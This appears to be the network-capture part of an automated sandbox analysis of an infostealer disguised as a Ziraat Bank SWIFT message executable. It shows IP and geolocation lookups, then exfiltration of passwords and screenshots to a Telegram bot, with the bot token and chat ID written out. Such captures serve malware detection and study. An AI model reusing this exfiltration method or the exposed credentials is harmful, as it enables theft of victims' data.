                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:21.910072088 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 69d893b2087336a96a97dba55cc6d87f
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        56192.168.2.550104193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:25.480766058 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:26.810435057 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 3b11aa8833e5bd22b2315a81baa7da39
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        57192.168.2.550107193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:30.734570980 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:32.002806902 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 8a2f93acbed0aec35d6fdc12cfd65cb0
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        58192.168.2.550110193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:35.553623915 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:36.826181889 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:36 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: ffe39447133cea750ec9a53add50f485
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549709172.67.177.134443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:40 UTC877INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:38:39 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 362
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 24688
                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGb1GA9ikWgosI6W0zAtD2G8Tb5uaCubECFwfrQSEXYMA0CucYGGylX0ySIk3IW%2B3a%2FD%2BsEMPPlvHDmyhz9u5q1Se2oIS42qtiz8FQW%2BB0DgwGIAAP3qG6bGvvWgYSu3FYXp54zi"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f1084f3be5a439a-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1661&rtt_var=639&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1689814&cwnd=233&unsent_bytes=0&cid=9b8d19cc6012e42c&ts=505&x=0"
                                                                        2024-12-12 20:38:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549711149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:47 UTC296OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary================8dd1ac31045a2d0
                                                                        Host: api.telegram.org
                                                                        Content-Length: 1088
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:47 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 61 63 33 31 30 34 35 61 32 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: --===============8dd1ac31045a2d0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                        2024-12-12 20:38:48 UTC388INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:38:47 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 544
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        2024-12-12 20:38:48 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 31 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 35 33 36 32 34 38 39 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 6f 61 68 62 65 62 6f 33 33 35 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6e 6f 61 68 62 65 62 6f 34 34 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 30 36 34 36 34 34 39 38 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 65 62 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 68 61 6c 65 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 30 33 35 39 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                        Data Ascii: {"ok":true,"result":{"message_id":3178,"from":{"id":7553624894,"is_bot":true,"first_name":"noahbebo335bot","username":"noahbebo444bot"},"chat":{"id":8064644982,"first_name":"Bebo","last_name":"Shales","type":"private"},"date":1734035927,"document":{"file_


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549716149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:51 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1af3ce061eff
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675713
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 61 66 33 63 65 30 36 31 65 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1af3ce061effContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:38:51 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:38:52 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:38:52 GMT
                                                                        Content-Type: application/json
